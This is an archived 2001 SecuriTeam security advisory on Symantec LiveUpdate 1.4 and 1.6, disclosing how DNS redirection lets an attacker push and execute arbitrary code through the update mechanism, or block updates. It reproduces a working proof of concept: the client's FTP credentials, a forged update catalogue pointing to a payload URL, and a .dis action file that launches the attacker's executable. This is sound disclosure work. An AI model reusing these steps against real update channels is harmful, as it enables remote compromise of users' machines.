[NT] Symantec LiveUpdate Vulnerable to Security Attacks

From: support@securiteam.com
Date: 10/10/01 

From: support@securiteam.com
To: list@securiteam.com
Subject: [NT] Symantec LiveUpdate Vulnerable to Security Attacks
Message-Id: <20011009222939.31F2C138C4@mail.der-keiler.de>
Date: Wed, 10 Oct 2001 00:29:39 +0200 (CEST)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

When was the last time you checked your server's security?
How about a monthly report?
http://www.AutomatedScanning.com - Know that you're safe.
- - - - - - - - -

  Symantec LiveUpdate Vulnerable to Security Attacks
------------------------------------------------------------------------

SUMMARY

LiveUpdate is a tool shipped with most Symantec products to download
updates from the Symantec update servers. It is included as part of the
Norton Antivirus Package and several other products in the Symantec
product line.

Version 1.4 of LiveUpdate (shipped with Norton Antivirus 5.x) can be used
for rapid deployment of hostile code (backdoors, Trojan applications,
viruses, worms - if unknown to Norton Anti Virus) and for remote
penetration of systems running LiveUpdate via redirection of the initial
connection to a server controlled by the attacker.

Version 1.6 of LiveUpdate (shipped with the latest Norton Antivirus 2001
package) does not allow for this type of attack, but it can be prevented
from downloading virus descriptions and product updates. It can also be
used as part of distributed denial of service attacks by the same attack
as described for version 1.4.

DETAILS

Vulnerable systems:
Symantec LiveUpdate version 1.4
Symantec LiveUpdate version 1.6

When LiveUpdate 1.4 is started (either by hand or as a scheduled task), it
looks for the server update.symantec.com. An attacker can use one of
several attacks to return false information to the querying host such as:
 - The attacker controls the DNS server and creates a master zone for
symantec.com.
 - The attacker uses routing-based attacks to impersonate the DNS server.
 - The attacker uses DNS poisoning on the DNS server to return a false IP
address.
 - The attacker uses layer 2 connection interception to impersonate the
DNS server.
 - The attacker sends false DNS responses to the querying host.

When the host running LiveUpdate tries to connect to update.symantec.com
via FTP, it is actually connecting to the FTP server of the attacker's
choice. LiveUpdate will then try to receive the file livetri.zip located
in the FTP server directory /opt/content/onramp. This archive contains the
file LIVEUPDT.TRI that holds a complete list of all Symantec product
updates. After LiveUpdate has received the file, it will compare the
product versions to the versions of the Symantec products installed on the
host and check the appropriate sequence numbers to see if an update is
required. If an update is required, LiveUpdate will receive the file
specified, uncompress it (ZIP format), and perform the actions described
in the .dis file. This includes the execution of downloaded executables.
The reader might see by now how an attacker can use this behavior in ways
other than intended by Symantec.

LiveUpdate 1.6 follows the same procedure described above with one
exception. The actual downloaded update package is different. First, it is
no longer a classic ZIP archive but rather some type of Symantec data
compression. Additionally, the file contains "cryptographic signatures" of
all update files. This signature makes it virtually impossible to use
LiveUpdate 1.6 as penetration tool. However, by specifying a large file
location on the Internet, a scheduled LiveUpdate session in a medium sized
company will lead to network degradation and outages due to the large
amount of traffic generated.

An item of interest is that version 1.6 does not use cryptographic
signatures to verify the initial list LIVEUPDT.TRI even though it places
signatures on all other files. By applying the attack described above and
never changing the content of the file, one can prevent any updates the
victim host might require.

Example:
An example attack was performed for LiveUpdate 1.4 by taking over a DNS
server and creating a master zone for symantec.com. A false address for
the FTP server update.symantec.com was then returned. This FTP server was
configured to with the user 'cust-r2', which is used by LiveUpdate with
the password 'Alpc2p30'. It is not known if all LiveUpdate installations
use the same username and password - but it is not relevant.

The file /opt/content/onramp/livetri.zip contained a modified LIVEUPDT.TRI
file with the following content:

 [LiveUpdate]
 Legal=Copyright 1995-2000 (c) Symantec Corporation
 LastModified=20010920 05:58PM
 Type0=Updates
 Type1=Add-Ons
 Type2=Documentation

 [Mandatory0]
 Exclusive=FALSE
 ProductName=LiveUpdate
 Version=1.4
 Language=English
 ItemSeqName=LiveUpdateSeq
 ItemSeqData=20000508
 FileName=ihack.x86
 Size=624807
 ActionItem=noreboot.dis
 TypeName=Updates
 ItemName=LiveUpate 1.6
 ItemDetails=Hacks your computer using LiveUpdate
 Platform=x86
 AdminCompatible=FALSE
 URL=http://www.example.com/hackme.x86

While LiveUpdate 1.4 has a preference to use the FileName entry and tries
to receive the file via FTP, 1.6 prefers the URL given. Since this is a
mandatory update for LiveUpdate itself, it will receive the file first and
then try to update itself.

The file ihack.x86 is actually a renamed ihack.zip file with the following
content:

NOREBOOT.DIS
LUUPDATE.EXE
LUSETUP.EXE

LUUPDATE.EXE is the Trojan/backdoor/whatever file the attacker wants the
system to execute. NOREBOOT.DIS is a INI-like file that contains the
actions LiveUpdate should perform when downloading of the file is
complete. It has the following content:

UPDATE (TempDir\*.EXE, LiveUpdateDir, 0)
LAUNCH (LiveUpdateDir, LUUPDATE.EXE, "", 0)
DELAYDELETE (LiveUpdateDir, LUUPDATE.EXE)

LUSETUP.exe was part of a real update package we inspected and might be
left out - this was not tested. We just used the same file as LUUPDATE.exe
and it worked.

When the victim host triggered the update mechanism, it downloaded
livetri.zip and then ihack.x86. It then executed the application
LUUPDATE.exe and told the user "the update was successfully completed.
Thank you."

Vendor response:
According to symsecurity@symantec.com, LiveUpdate 1.4 is no longer the
current version and every installation should be updated to version 1.6 by
now.

Regarding the redirection of the LiveUpdate client, Symantec stated: "This
is, unfortunately, an underlying issue with the Internet infrastructure
that we are well aware of but have limited control over other than with
connection points over which we exercise authority."

As for the denial of service condition, the statement is: "The denial of
service activity, while potentially possible under the scenarios you
indicate below, would affect only a small percentage of our user base as
any spoofing, redirection would be limited to a local Internet
area/region."

Solution:
The improvements Symantec introduced in LiveUpdate 1.6 and higher are
actually, "best practice security". It would be advisable to update all
Symantec products using LiveUpdate to version 1.6. This however does not
prevent an attacker from using LiveUpdate as denial of service tool or
preventing system updates.

Symantec should use the same cryptographic signature method on the
livetri.zip file and advise its customer base off the fact that LiveUpdate
1.4 is highly insecure.

Beware! LiveUpdate 1.4 WILL NOT updates itself to 1.6 as far as we are
able to determine. The latest LiveUpdate 1.6.x is available from the URL
<http://www.symantec.com/techsupp/files/lu/lu.html>
http://www.symantec.com/techsupp/files/lu/lu.html

According to Symantec, the next version of LiveUpdate will further enhance
security. No statement about the nature of these enhancements was made.

ADDITIONAL INFORMATION

The information has been provided by <mailto:fx@phenoelit.de> FX.

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

Relevant Pages